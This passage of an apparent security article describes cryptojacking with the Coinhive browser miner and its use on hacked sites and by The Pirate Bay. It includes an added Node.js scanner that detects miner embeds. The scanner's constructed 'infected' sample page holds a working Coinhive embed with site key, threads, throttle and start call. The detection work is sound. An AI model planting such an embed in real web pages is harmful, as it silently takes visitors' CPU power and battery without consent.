and it mines for Monero (XMR). It was implemented as an alternative revenue-gathering method to ads for website administrators. It works by running the script directly in the visitor’s browser, where it mines cryptocurrency in the background using the visitor’s CPU power. But hackers took this service and deployed it on vulnerable websites that they had exploited, and thus started to anonymously and silently mine cryptocurrency every time the website was accessed. Of course, they never asked the victim for permission or brought the mining to the victim’s attention. Power lies in numbers: more exploited websites means more unique visitors, which in turn means more CPU power, and the obvious result is more crypto-bucks.
From a hacker’s perspective, this fraudulent scheme requires few resources and offers the possibility of unlocking a treasure filled with money, which is why it will gain more and more popularity. But what are the consequences for its victims? Here we can expect anything from poorer device performance caused by the CPU spike to a shortened CPU life due to overheating. Another result could be shorter battery life.
The first script source line instructs the victim’s browser to download the .js file from the Coinhive website. The miner variable line tells Coinhive which account is mining for the Monero cryptocurrency (our unique site key), and the “miner.start” line triggers the mining immediately.
Of course, more advanced features can be used in such scripts, like threads and throttle:
Throttle refers to a process that regulates the rate at which application processing is conducted. Put as simply as possible, it configures how much CPU power is used. A lower throttle combined with a higher number of threads produces the maximum effect, as together they decide how much CPU power is used in the client’s browser.
A few months ago, the reputable site blackberrymobile.com fell victim to the cryptocurrency-loving hackers.
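Seen from the defender's side, the snippet and options described above can be detected in page HTML. The following Node.js scanner is an added example, not code from the original article: it flags a Coinhive-style embed and reports its threads and throttle settings. The `CoinHive.Anonymous` constructor name, the script URL, the site key and both sample pages are constructed assumptions that follow the structure the text describes.

```javascript
// Added example: flag Coinhive-style miner embeds in a page's HTML.
// Patterns are assumptions based on the snippet structure described in the text:
// a remote .js load, a miner object created with a site key, and a start() call.
const SCRIPT_SRC = /<script[^>]*\bsrc\s*=\s*["']([^"']*coinhive[^"']*\.js)["']/gi;
const MINER_NEW = /new\s+CoinHive\.\w+\(\s*["']([^"']+)["']\s*(?:,\s*(\{[^}]*\}))?/gi;
const MINER_START = /\.start\s*\(/i;

// Pull a numeric option such as threads or throttle out of the options literal.
function numOption(optText, name) {
  const m = new RegExp(name + "\\s*:\\s*([0-9.]+)").exec(optText || "");
  return m ? Number(m[1]) : null;
}

function findMinerEmbeds(html) {
  const scriptUrls = [];
  const miners = [];
  for (const m of html.matchAll(SCRIPT_SRC)) scriptUrls.push(m[1]);
  for (const m of html.matchAll(MINER_NEW)) {
    miners.push({
      siteKey: m[1], // identifies the account that receives the mined coins
      threads: numOption(m[2], "threads"),
      throttle: numOption(m[2], "throttle"), // per the text: lower means more CPU
    });
  }
  return {
    scriptUrls,
    miners,
    startsImmediately: miners.length > 0 && MINER_START.test(html),
    suspicious: scriptUrls.length > 0 || miners.length > 0,
  };
}

// Constructed sample pages (not taken from any real site).
const SAMPLE_INFECTED = `
<html><body><h1>Shop</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY', {threads: 4, throttle: 0.2});
  miner.start();
</script></body></html>`;
const SAMPLE_CLEAN = `<html><body><script src="/static/app.js"></script></body></html>`;

console.log(JSON.stringify(findMinerEmbeds(SAMPLE_INFECTED), null, 2));
console.log(JSON.stringify(findMinerEmbeds(SAMPLE_CLEAN)));
```

A site key in the findings that does not belong to the site owner is the clearest sign that the embed was injected by a third party.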
Unfortunately, because of the amazing amount of money that can be “earned” in a relatively short amount of time and with implied costs near zero, not only hackers decided to get a piece of the cake. The well-known torrent site “The Pirate Bay” is among those to have used the Coinhive code and neglected to tell visitors it was using their browsers to mine cryptocurrency. So, this wasn’t an action that could be attributed directly to hackers, but to this website’s administrator.
These kinds of attacks were, of course, set to work on all available platforms, like Windows, Linux, and macOS. Coinhive was also implemented to work on mobile devices. Several apps that used this mining technology were found in the Google Play Store, and this stealth behavior was triggered right after installation.
Some malicious ads even popped up on YouTube after a threat actor managed to inject a coin miner script into them. Fortunately, YouTube found the issue and fixed it in a matter of hours.
Think twice before investing in such coins as the cryptocurrency market approaches its saturation. Bitcoin is the oldest and the most expensive cryptocurrency. Its ups and downs alter the state of all the other cryptocurrencies.